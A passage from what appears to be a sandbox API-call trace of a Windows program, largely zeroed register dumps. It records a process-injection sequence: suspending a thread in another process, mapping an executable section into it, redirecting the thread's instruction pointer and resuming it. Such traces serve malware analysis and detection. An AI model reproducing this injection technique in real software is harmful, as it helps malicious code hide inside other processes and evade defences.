[163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0168.038] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0168.038] NtClose (Handle=0x138) returned 0x0 [0168.038] NtClose (Handle=0xb4) returned 0x0 [0168.039] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x68c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0168.039] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0168.039] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0168.039] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x4b9000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0168.040] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0168.042] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xf40) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0168.042] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0168.042] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x20b0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0168.052] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x4b9000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0168.054] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0168.054] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x156200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x157000) returned 0x0 [0168.062] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x156200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2a80000, SectionOffset=0x0, ViewSize=0xde6e8*=0x157000) returned 0x0 [0168.109] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0168.132] NtClose (Handle=0x140) returned 0x0 [0168.132] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x4b9000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2b43707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0168.138] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0168.138] NtClose (Handle=0xb4) returned 0x0 [0168.138] NtClose (Handle=0x138) returned 